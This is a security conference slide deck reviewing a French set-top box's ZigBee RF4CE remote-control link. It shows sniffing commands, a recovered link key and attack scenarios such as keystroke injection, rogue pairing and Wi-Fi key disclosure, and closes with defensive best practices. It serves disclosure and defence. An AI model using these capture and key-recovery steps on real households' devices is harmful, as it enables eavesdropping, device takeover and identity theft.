Nuit Du Hack – Paris – July, 2nd 2016 Renaud Lifchitz (renaud.lifchitz@digitalsecurity.fr) ZigBee security review of a famous French set-top box

Outline Introduction to ZigBee protocol ZigBee useful tools Study of our target Best practices for wireless security P. 2 ZigBee security review of a famous French set-top box - Digital Security

Speaker's bio French senior security engineer Main activities:  Penetration testing & security audits  Security research  Security trainings Main interests:  Security of protocols (authentication, cryptography, information leakage, reverse engineering...)  Number theory (integer factorization, primality testing, elliptic curves...) ZigBee security review of a famous French set-top box - Digital Security P. 3

About Digital Security Company founded in 2015 by a group of experts with the support of Econocom Group Provides advanced services in security audit, consulting and support Our expertise combine traditional security for infrastructure and application, and skills oriented to the ecosystem of connected objects Has created the CERT-UBIK, first European CERT™ specialized on IoT security (OSIDO monitoring service) Has a laboratory for addressing technologies, data exchange protocols and specific operating systems Diamond sponsor of this event ZigBee security review of a famous French set-top box - Digital Security P. 4

Introduction to ZigBee protocol

ZigBee IEEE 802.15.4-based protocol to create PANs & mesh networks Mostly in 2.4 GHz ISM band in Europe Created in 1998, standardized in 2003, revised in 2006 High-level & low-power 10-100m. communications Supports AES-128-CCM* encryption A lot of variants:  ZigBee (2004/2006/2007)  ZigBee PRO qui définit une pile et des caractéristiques supplémentaires (2007/2012)  ZigBee 3.0 (in progress)  ZigBee IP  ZigBee RF4CE  ZigBee Green Power Introduction to ZigBee protocol P. 6 ZigBee security review of a famous French set-top box - Digital Security

ZigBee RF4CE ZigBee RF4CE is an open standard for radio based remote controls for audio/video consumer electronics Commonly used in the USA Still quite rare in Europe Built onto the IEEE 802.15.4 standard MAC and PHY layers Introduction to ZigBee protocol P. 7 ZigBee security review of a famous French set-top box - Digital Security

ZigBee RF4CE advantages over infrared remote controls No need for direct line of sight No sensibility to light Supports encryption Bidirectionnal Higher data rate (multimedia & games usage) Introduction to ZigBee protocol P. 8 ZigBee security review of a famous French set-top box - Digital Security

ZigBee useful tools

Hardware tools: TI CC2531 dongle 45€ USB stick http://www.ti.com/tool/cc2531emk ZigBee useful tools P. 10 ZigBee security review of a famous French set-top box - Digital Security

Hardware tools: Atmel RZUSBstick 40€ USB stick Supports only sniffing with default firmware http://www.atmel.com/tools/RZUSBSTICK.aspx ZigBee useful tools P. 11 ZigBee security review of a famous French set-top box - Digital Security

Software tools: Texas Instruments Packet Sniffer Pros:  Works out-of-the-box with TI CC2531 dongle  Windows GUI tool Cons:  Doesn’t support newer ZigBee variants (ex.: RF4CE) ZigBee useful tools P. 12 ZigBee security review of a famous French set-top box - Digital Security

Software tools: KillerBee framework Framework of several Python tools to study ZigBee-based protocols KillerBee firmware allows Atmel RZUSBsticks to sniff & inject packets Hardware requirements to reflash the dongle https://github.com/riverloopsec/killerbee ZigBee useful tools P. 13 ZigBee security review of a famous French set-top box - Digital Security

Software tools: Ubiqua Protocol Analyzer Pros:  Supports a lot of IEEE 802.15.4 variants  Windows GUI tool  Seamless support for encryption Cons:  Commercial license ZigBee useful tools P. 14 ZigBee security review of a famous French set-top box - Digital Security

Study of our target

About the target Famous French set-top box for Internet and TV access distributed by a well-known Internet service provider Study took place from December 2015 during spare time 3 components:  Internet box (not directly studied here)  TV box  Wireless ZigBee-based remote control (RF4CE) Study of our target P. 16 ZigBee security review of a famous French set-top box - Digital Security

RF4CE key exchange protocol Key seed packets to LinkKey (Source: ZigBee RF4CE Specification Version 1.01) Study of our target P. 17 ZigBee security review of a famous French set-top box - Digital Security

Key exchange protocol Vendor has chosen to distribute LinkKey across 37 key seeds (not standard) 37 Key seeds of 80 bytes Every key seed is acknowledged in clear text Key exchange is literally « whispered », the link quality drops from -6dBm for normal keystrokes to -58dBm for key exchange!  Security by obscurity, key exchange is basically clear text! Study of our target P. 18 ZigBee security review of a famous French set-top box - Digital Security

When will a key exchange occur? During a manual pairing When remote control batteries are replaced (decreasing signal power can be remotely monitored until replacement) Some firmware updates require re-pairing Disassociation from an attacker:  Jamming  Association flooding Study of our target P. 19 ZigBee security review of a famous French set-top box - Digital Security

Sniffing the communication between STB and RC Steps:  1) Capture raw traffic (used channel is always 15 for this target)  2) Optionally convert it to XML (.opml extension) with Ubiqua for easier manipulation (lack of good other RF4CE protocol dissector)  3) Find « Key Seed » packets and extract their payload  4) Compute LinkKey using successive XORs  5) Decrypt traffic using AES-128-CCM* and the LinkKey Study of our target P. 20 ZigBee security review of a famous French set-top box - Digital Security

Computing LinkKey Capture raw traffic using KillerBee: $ zbid Dev Product String Serial Number 001:008 KILLERB001 FFFFFFFFFFFF $ zbstumbler zbstumbler: Transmitting and receiving on interface '001:008' New Network: PANID 0x6689 Source 0x7F2A Ext PANID: Unknown Stack Profile: ZigBee Standard Stack Version: ZigBee Prototype Channel: 15 $ zbdump -c 15 -w rcdump.pcap zbdump: listening on '001:008', link-type DLT_IEEE802_15_4, capture size 127 bytes 102 packets captured Study of our target P. 21 ZigBee security review of a famous French set-top box - Digital Security

Computing LinkKey Find key seed packets and compute the key: Study of our target P. 22 ZigBee security review of a famous French set-top box - Digital Security

Computing LinkKey Find key seed packets and compute the key: $ python opml2key.py rcdump.opml 37 key seed packets found Computed key: 70247b83a1b8d23dd15c595a5b5bfb43 Study of our target P. 23 ZigBee security review of a famous French set-top box - Digital Security

Computing LinkKey Successfully decrypted keystroke packet (Ubiqua) Mostly null bytes! Study of our target P. 24 ZigBee security review of a famous French set-top box - Digital Security

Possible attacks Using sniffing of the key exchange:  Sniffing of keystrokes and decryption  Remote control of the set-top box (key injection)  All associated attacks Two kinds of attack scenarios:  Blind: Victim’s TV screen is not visible  Not blind: Victim’s TV screen is visible (for instance through a window) or attacker captures TV leaking emanations (up to 20 meters, depends on the TV monitor) Study of our target P. 25 ZigBee security review of a famous French set-top box - Digital Security

Attack scenario 1 Arbitrary access to set-top box/subscription functions Requirements: none Attack type: mostly blind Impacts:  DoS (controlled power off/reboots of the TV/set-top box)  Subscriptions to pay channels  Pairing of additionnal remote contols Study of our target P. 26 ZigBee security review of a famous French set-top box - Digital Security

Attack scenario 2 Arbitrary Bluetooth activation and device pairing: mouse, keyboard, headset, … Requirements: connected BT dongle Attack type: blind or not blind (PIN pairing depends on the BT device capability) Impacts: keystroke injection, listening to voicemail (through headset) Study of our target P. 27 ZigBee security review of a famous French set-top box - Digital Security

Attack scenario 3 Arbitrary Internet browsing & downloading Requirements: none Attack type: blind Impacts: identity theft through:  mail sending and Twitter posting (for configured accounts)  illegal browsing & downloads (Bittorrent) Study of our target P. 28 ZigBee security review of a famous French set-top box - Digital Security

Attack scenario 4 Arbitrary access to victim’s phone line through DECT pairing Requirements: none Attack type: blind (4-digit PIN bruteforce) or not blind Impacts: identity theft through:  Calls and call answers  Access to voicemail Study of our target P. 29 ZigBee security review of a famous French set-top box - Digital Security

Attack scenario 5 Arbitrary access to victim’s LAN through Wi-Fi (key disclosure) Requirements: Wi-Fi used Attack type: not blind Impacts: identity theft through full internet access, LAN sniffing, MitM… Study of our target P. 30 ZigBee security review of a famous French set-top box - Digital Security

Changes in the key exchange The key exchange protocol changed during the study (software updates are automatic at boot time) Now, every key seed is 22 bytes long instead of 80 Provider moves away from the RF4CE specification Still 37 different key seeds, but at a faster pace (some short packets like ACK can be dropped at capture time) How is the 16-byte AES key built from 22-byte key seeds? Is the new key echange more secure? No, still not a challenge, same security level Study of our target P. 31 ZigBee security review of a famous French set-top box - Digital Security

Conclusion Attacks not specific to this target, any ZigBee set-top box might be vulnerable Attack not easy due to low signal level during key exchange but possible with:  a LNA for signal reception  and/or a power amplifier for signal reception & emission  and/or a directional antenna (Wi-Fi antenna) ZigBee-based key exchanges are generally vulnerable Few RF4CE protocol dissectors are good Study of our target P. 32 ZigBee security review of a famous French set-top box - Digital Security

Best practices for wireless security

Threats & countermeasures Best practices for wireless security P. 34 ZigBee security review of a famous French set-top box - Digital Security Threats Good countermeasures Passive snooping - Secure key exchange (ex.: Diffie-Hellman) - Encryption Volontary or involuntary jamming - Spread spectrum - Frequency/channel hopping Usurpation (ex.: replay) - Anti-replay mechanisms (cryptographic « nonce » ) - Authentication using a challenge

Best practices for wireless protocols Use suited wireless protocols according to your security needs Pairing is usually a critical stage, do it in a controlled environment Monitor continuously the network for anomalies Don’t re-invent the wheel, use well-known security recipes (previous slide): Bluetooth (not BLE) is nearly perfect When possible, protect physical perimeter of use (security-in-depth philosophy) Best practices for wireless security P. 35 ZigBee security review of a famous French set-top box - Digital Security

Thanks! Questions? IoT Security Contact: info@digitalsecurity.fr P. 36 ZigBee security review of a famous French set-top box - Digital Security